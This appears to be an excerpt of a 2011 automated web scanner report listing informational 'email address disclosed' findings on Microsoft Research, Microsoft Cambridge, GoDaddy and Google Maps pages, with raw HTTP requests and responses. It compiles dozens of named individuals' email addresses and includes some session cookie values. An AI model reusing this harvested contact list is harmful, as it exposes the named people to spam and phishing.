Path:	/pc/js/1/gd_js_20110817.min.js

Issue detail

The following email address was disclosed in the response:

YourEmail@YourWebsite.com

Request

GET /pc/js/1/gd_js_20110817.min.js HTTP/1.1
Host: img3.wsimg.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 18 Aug 2011 00:52:01 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 35969
Cache-Control: max-age=3888000
Date: Sat, 03 Sep 2011 21:28:59 GMT
Connection: close

var $pc=jQuery;var agt=navigator.userAgent.toLowerCase();var pcj_isIe=agt.indexOf("msie")!=-1;var pcj_isIe6under=false;if(pcj_isIe){pcj_isIe6under=(agt.indexOf("msie 6")!=-1||agt.indexOf("msie 5")!=-1
...[SNIP]...
=true;if(a.stopPropagation){a.stopPropagation()}if(a.preventDefault){a.preventDefault()}return false}function pcj_vemail(d){var c=true;var a=-1;var b=-1;if(c){tmp=d;a=tmp.indexOf("@");if((a>0)&&(tmp!="YourEmail@YourWebsite.com")&&(tmp.length<=500)){b=tmp.indexOf(".",a);if(tmp.length<=b+2){c=false}}else{c=false}}return c}function pcj_signup(){var a=document.getElementById("pcf_email");if(a.value.length>
...[SNIP]...

21.11. http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/363c/maps2/%7Bmain,mod_util,mod_act,mod_act_s,mod_actbr,mod_adf,mod_appiw,mod_mg,mod_mssvt,mod_rst,mod_strr%7D.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.gstatic.com
Path:	/cat_js/intl/en_us/mapfiles/363c/maps2/%7Bmain,mod_util,mod_act,mod_act_s,mod_actbr,mod_adf,mod_appiw,mod_mg,mod_mssvt,mod_rst,mod_strr%7D.js

Issue detail

The following email address was disclosed in the response:

pat@gmail.com

Request

GET /cat_js/intl/en_us/mapfiles/363c/maps2/%7Bmain,mod_util,mod_act,mod_act_s,mod_actbr,mod_adf,mod_appiw,mod_mg,mod_mssvt,mod_rst,mod_strr%7D.js HTTP/1.1
Host: maps.gstatic.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=1+Memorial+Drive,+Cambridge,+MA&sll=37.0625,-95.677068&sspn=36.726391,77.607422&ie=UTF8&hq=&hnear=1+Memorial+Dr,+Cambridge,+Middlesex,+Massachusetts+02142&ll=42.361406,-71.081282&spn=0.008372,0.018947&z=14&output=embed
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Last-Modified: Tue, 30 Aug 2011 00:54:01 GMT
Date: Thu, 01 Sep 2011 23:16:21 GMT
Expires: Fri, 31 Aug 2012 23:16:21 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 500926
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 136729

(function(){'use strict';function aa(a){throw a;}
var h=void 0,i=null;function ca(){return function(a){return a}}
function da(){return function(){}}
function ea(a){return function(b){this[a]=b}}
funct
...[SNIP]...
}; MY.prototype.Ea=function(){rQa(this);this.refresh()};U("rst",1,TY);U("rst");', '', []);
__gjsload_maps2__('strr', 'GAddMessages({13828:"Sign in to use stars with",13829:"Sign in »",13830:"ex: pat@gmail.com",13831:"No account yet?",13832:"It\'s free and easy.",13833:"Create an account »",13338:"Seeing stars",13339:"When you star an item, it appears on your maps and is listed in My Maps.<br />
...[SNIP]...

21.12. http://microsoftcambridge.com/Events/tabid/57/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/Events/tabid/57/Default.aspx

Issue detail

The following email address was disclosed in the response:

rsvp@rootcause.org

Request

GET /Events/tabid/57/Default.aspx HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=A3C0DAFD2501960491DB6D8BB4AF78CD; .ASPXANONYMOUS=RwXpWsygzAEkAAAANDBmYzBmNzItYTVjZi00ZjUxLTlhMWEtODkxYzlhOWM2NDQ40; language=en-US; X-Mapping-pfddgonl=29291CB50178807E04EE211C8DF8D85B

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 153021
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:08:27 GMT

<!DOCTYPE html>
<html lang="en-US">
<head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type" /><meta content="text/javascript" http-equiv="Content-Script-Type" /><meta conten
...[SNIP]...
<a href="mailto:rsvp@rootcause.org" target="_blank">
...[SNIP]...

21.13. http://microsoftcambridge.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/Resources/Shared/scripts/DotNetNukeAjaxShared.js

Issue detail

The following email address was disclosed in the response:

nik.kalyani@dotnetnuke.com

Request

GET /Resources/Shared/scripts/DotNetNukeAjaxShared.js HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=A3C0DAFD2501960491DB6D8BB4AF78CD; .ASPXANONYMOUS=RwXpWsygzAEkAAAANDBmYzBmNzItYTVjZi00ZjUxLTlhMWEtODkxYzlhOWM2NDQ40; language=en-US; X-Mapping-pfddgonl=29291CB50178807E04EE211C8DF8D85B

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 03 Sep 2011 13:05:22 GMT
Accept-Ranges: bytes
Last-Modified: Thu, 17 Feb 2011 20:35:54 GMT
Content-Length: 10101
Connection: Keep-Alive
X-Cache-Info: cached

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this softwar
...[SNIP]...
<history>
   ''' Version 1.0.0: Feb. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' Version 1.0.1: Oct. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' </history>
...[SNIP]...

21.14. http://microsoftcambridge.com/Resources/Shared/scripts/widgets.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/Resources/Shared/scripts/widgets.js

Issue detail

The following email address was disclosed in the response:

nik.kalyani@dotnetnuke.com

Request

GET /Resources/Shared/scripts/widgets.js HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=A3C0DAFD2501960491DB6D8BB4AF78CD; .ASPXANONYMOUS=RwXpWsygzAEkAAAANDBmYzBmNzItYTVjZi00ZjUxLTlhMWEtODkxYzlhOWM2NDQ40; language=en-US; X-Mapping-pfddgonl=29291CB50178807E04EE211C8DF8D85B

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 03 Sep 2011 13:05:22 GMT
Accept-Ranges: bytes
Last-Modified: Thu, 17 Feb 2011 20:36:04 GMT
Content-Length: 11495
Connection: Keep-Alive
X-Cache-Info: cached

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and as
...[SNIP]...
<history>
''' Version 1.0.0: Oct. 16, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
''' </history>
...[SNIP]...

21.15. http://microsoftcambridge.com/controls/SolpartMenu/spmenu.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/controls/SolpartMenu/spmenu.js

Issue detail

The following email address was disclosed in the response:

jhenning@solpart.com

Request

GET /controls/SolpartMenu/spmenu.js HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=A3C0DAFD2501960491DB6D8BB4AF78CD; .ASPXANONYMOUS=RwXpWsygzAEkAAAANDBmYzBmNzItYTVjZi00ZjUxLTlhMWEtODkxYzlhOWM2NDQ40; language=en-US; X-Mapping-pfddgonl=29291CB50178807E04EE211C8DF8D85B

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 03 Sep 2011 13:04:10 GMT
Accept-Ranges: bytes
Last-Modified: Thu, 17 Feb 2011 20:36:42 GMT
Content-Length: 67819
Connection: Keep-Alive
X-Cache-Info: cached

//------------------------------------------------------//
// Solution Partner's ASP.NET Hierarchical Menu Control //
// Copyright (c) 2002-2005 //
// Jon Henning - Solution Partner's Inc //
// jhenning@solpart.com - http://www.solpart.com //
// Compatible Menu Version: <Min: 1400>
...[SNIP]...
tion spm_stopEventBubbling(e)
{
if (spm_browserType() == 'ie')
           window.event.cancelBubble = true;
       else
           e.stopPropagation();
}

//--- if you have a better solution send me an email - jhenning@solpart.com ---//
function spm_appendFunction(from_func, to_func)
{
if (from_func == null)
return new Function ( to_func );
return new Function ( spm_parseFunctionContents(from_func) + '\n' + spm_pa
...[SNIP]...

21.16. http://research.microsoft.com/en-us/about/contactus.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/contactus.aspx

Issue detail

The following email address was disclosed in the response:

rrt@waggeneredstrom.com

Request

GET /en-us/about/contactus.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.17. http://research.microsoft.com/en-us/collaboration/awards/fellows-women.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/awards/fellows-women.aspx

Issue detail

The following email address was disclosed in the response:

msrsch@microsoft.com

Request

Response

21.18. http://research.microsoft.com/en-us/collaboration/global/india/india-awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/india/india-awards.aspx

Issue detail

The following email address was disclosed in the response:

indiaerp@microsoft.com

Request

Response

21.19. http://research.microsoft.com/en-us/collaboration/global/india/phdfellowships.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/india/phdfellowships.aspx

Issue detail

The following email address was disclosed in the response:

indiaerp@microsoft.com

Request

Response

21.20. http://research.microsoft.com/en-us/collaboration/global/latam/latam-awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/latam/latam-awards.aspx

Issue detail

The following email address was disclosed in the response:

latamint@microsoft.com

Request

Response

21.21. http://research.microsoft.com/en-us/collaboration/global/northam/northam-awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/northam/northam-awards.aspx

Issue detail

The following email address was disclosed in the response:

msfellow@microsoft.com

Request

Response

21.22. http://research.microsoft.com/en-us/events/escience2011/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/events/escience2011/

Issue detail

The following email address was disclosed in the response:

esci@microsoft.com

Request

GET /en-us/events/escience2011/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.23. http://research.microsoft.com/en-us/jobs/intern/cmic.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/cmic.aspx

Issue detail

The following email address was disclosed in the response:

cmiccont@microsoft.com

Request

GET /en-us/jobs/intern/cmic.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.24. http://research.microsoft.com/en-us/labs/cmic/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/cmic/default.aspx

Issue detail

The following email address was disclosed in the response:

cmic-contacts@microsoft.com

Request

GET /en-us/labs/cmic/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.25. http://research.microsoft.com/en-us/labs/ilabs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/ilabs/default.aspx

Issue detail

The following email address was disclosed in the response:

herrecAC@microsoft.com

Request

GET /en-us/labs/ilabs/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.26. http://research.microsoft.com/en-us/news/features/2010interns-081610.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/2010interns-081610.aspx

Issue detail

The following email address was disclosed in the response:

msreditr@microsoft.com

Request

GET /en-us/news/features/2010interns-081610.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.27. http://research.microsoft.com/en-us/news/features/hoare-080411.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/hoare-080411.aspx

Issue detail

The following email address was disclosed in the response:

msreditr@microsoft.com

Request

GET /en-us/news/features/hoare-080411.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.28. http://research.microsoft.com/en-us/news/features/interns-080309.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/interns-080309.aspx

Issue detail

The following email address was disclosed in the response:

msreditr@microsoft.com

Request

GET /en-us/news/features/interns-080309.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.29. http://research.microsoft.com/en-us/news/features/interns2011-082511.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/interns2011-082511.aspx

Issue detail

The following email address was disclosed in the response:

msreditr@microsoft.com

Request

GET /en-us/news/features/interns2011-082511.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.30. http://research.microsoft.com/en-us/news/features/phillipstr35-082311.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/phillipstr35-082311.aspx

Issue detail

The following email address was disclosed in the response:

msreditr@microsoft.com

Request

Response

21.31. http://research.microsoft.com/en-us/news/features/siggraph2011awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/siggraph2011awards.aspx

Issue detail

The following email address was disclosed in the response:

msreditr@microsoft.com

Request

GET /en-us/news/features/siggraph2011awards.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.32. http://research.microsoft.com/en-us/news/features/speechrecognition-082911.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/speechrecognition-082911.aspx

Issue detail

The following email address was disclosed in the response:

msreditr@microsoft.com

Request

Response

21.33. http://research.microsoft.com/en-us/news/headlines/ibukaaward-081511.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/headlines/ibukaaward-081511.aspx

Issue detail

The following email address was disclosed in the response:

msreditr@microsoft.com

Request

GET /en-us/news/headlines/ibukaaward-081511.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.34. http://research.microsoft.com/en-us/people/bycook/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/bycook/default.aspx

Issue detail

The following email address was disclosed in the response:

a-lynnh@microsoft.com

Request

GET /en-us/people/bycook/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.35. http://research.microsoft.com/en-us/people/gray/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/gray/

Issue detail

The following email address was disclosed in the response:

grayproj@microsoft.com

Request

GET /en-us/people/gray/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.36. http://research.microsoft.com/en-us/people/gray/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/gray/default.aspx

Issue detail

The following email address was disclosed in the response:

grayproj@microsoft.com

Request

GET /en-us/people/gray/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.37. http://research.microsoft.com/en-us/people/larus/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/larus/default.aspx

Issue detail

The following email address was disclosed in the response:

larus@microsoft.com

Request

GET /en-us/people/larus/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.38. http://research.microsoft.com/en-us/people/liuj/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/liuj/default.aspx

Issue detail

The following email address was disclosed in the response:

myfirstname.mylastname@microsoft.com

Request

GET /en-us/people/liuj/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.39. http://research.microsoft.com/en-us/people/padmanab/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/padmanab/default.aspx

Issue detail

The following email address was disclosed in the response:

padmanab@microsoft.com

Request

GET /en-us/people/padmanab/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.40. http://research.microsoft.com/en-us/people/palarson/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/palarson/default.aspx

Issue detail

The following email address was disclosed in the response:

palarson@microsoft.com

Request

GET /en-us/people/palarson/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.41. http://research.microsoft.com/en-us/people/philbe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/philbe/

Issue detail

The following email addresses were disclosed in the response:

20philbe@microsoft.com
philbe@microsoft.com

Request

GET /en-us/people/philbe/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.42. http://research.microsoft.com/en-us/people/philbe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/philbe/default.aspx

Issue detail

The following email addresses were disclosed in the response:

20philbe@microsoft.com
philbe@microsoft.com

Request

GET /en-us/people/philbe/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.43. http://research.microsoft.com/en-us/people/ramjee/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/ramjee/

Issue detail

The following email address was disclosed in the response:

ramjee@microsoft.com

Request

GET /en-us/people/ramjee/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.44. http://research.microsoft.com/en-us/people/ranveer/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/ranveer/default.aspx

Issue detail

The following email address was disclosed in the response:

ranveer@microsoft.com

Request

GET /en-us/people/ranveer/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.45. http://research.microsoft.com/en-us/people/richdr/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/richdr/default.aspx

Issue detail

The following email address was disclosed in the response:

richdr@microsoft.com

Request

GET /en-us/people/richdr/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.46. http://research.microsoft.com/en-us/people/simonpj/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/simonpj/

Issue detail

The following email address was disclosed in the response:

simonpj@microsoft.com

Request

GET /en-us/people/simonpj/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.47. http://research.microsoft.com/en-us/people/simonpj/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/simonpj/default.aspx

Issue detail

The following email address was disclosed in the response:

simonpj@microsoft.com

Request

GET /en-us/people/simonpj/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.48. http://research.microsoft.com/en-us/people/thekkath/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/thekkath/default.aspx

Issue detail

The following email address was disclosed in the response:

thekkath@acm.org

Request

GET /en-us/people/thekkath/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.49. http://research.microsoft.com/en-us/press/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/default.aspx

Issue detail

The following email addresses were disclosed in the response:

joyannlo@microsoft.com
kellyfo@microsoft.com
kirsten.wiley@microsoft.com
msrc@webershandwick.com
msrpr@wagged.com
rachelh@microsoft.com
sriv@microsoft.com

Request

GET /en-us/press/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.50. http://research.microsoft.com/en-us/projects/wwt/contest.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/wwt/contest.aspx

Issue detail

The following email address was disclosed in the response:

wwtcrew@microsoft.com

Request

Response

21.51. http://research.microsoft.com/en-us/um/people/abegel/starlogo/starlogo-kybernetes-paper.doc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/abegel/starlogo/starlogo-kybernetes-paper.doc

Issue detail

The following email addresses were disclosed in the response:

abegel@cs.berkeley.edu
klopfer@mit.edu

Request

GET /en-us/um/people/abegel/starlogo/starlogo-kybernetes-paper.doc HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/msword
Last-Modified: Tue, 30 Jan 2007 02:11:33 GMT
Accept-Ranges: bytes
ETag: "dc919df61344c71:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:41 GMT
Connection: close
Content-Length: 968037

........................>.....    .............................................N...L.......................................................................................................................
...[SNIP]...
.....................................................................................................StarLogo Under the Hood and in the Classroom.Eric Klopfer, Massachusetts Institute of Technologyklopfer@mit.eduITAndrew Begel,University of California, Berkeleyabegel@cs.berkeley.edu.AbstractStarLogo is a computer modeling tool that empowers students to understand the world through the design and creation of complex systems models..StarLogo enables students to program software
...[SNIP]...
.i.m.1.....................(.................................s.w.i.m.2...................0.~.............    ...................t.h.e.o.r.y.b.u.i.l.d.e.r.2.....................5.}.........draft 4.........klopfer@mit.edu........Eric Klopfer.du.................................................................................................................................................................................
...[SNIP]...
.i.m.1..............`......(.................................s.w.i.m.2..............`....0.~.............    ...................t.h.e.o.r.y.b.u.i.l.d.e.r.2................`....5.}.........draft 4.........klopfer@mit.edu........Eric Klopfer.du...............
...........................Oh.....+'..0...x............................    .............F....Microsoft Word Document.....NB6W....Word.Document.8...................
...[SNIP]...
.....................................................................................................StarLogo Under the Hood and in the Classroom.Eric Klopfer, Massachusetts Institute of Technologyklopfer@mit.eduITAndrew Begel,University of California, Berkeleyabegel@cs.berkeley.edu.AbstractStarLogo is a computer modeling tool that empowers students to understand the world through the design and creation of complex systems models..StarLogo enables students to program software
...[SNIP]...

21.52. http://research.microsoft.com/en-us/um/people/bahl/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/bahl/

Issue detail

The following email address was disclosed in the response:

bahl@microsoft.com

Request

GET /en-us/um/people/bahl/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.53. http://research.microsoft.com/en-us/um/people/blampson/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/blampson/

Issue detail

The following email address was disclosed in the response:

blampson@microsoft.com

Request

GET /en-us/um/people/blampson/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 17 Jan 2007 17:35:00 GMT
Accept-Ranges: bytes
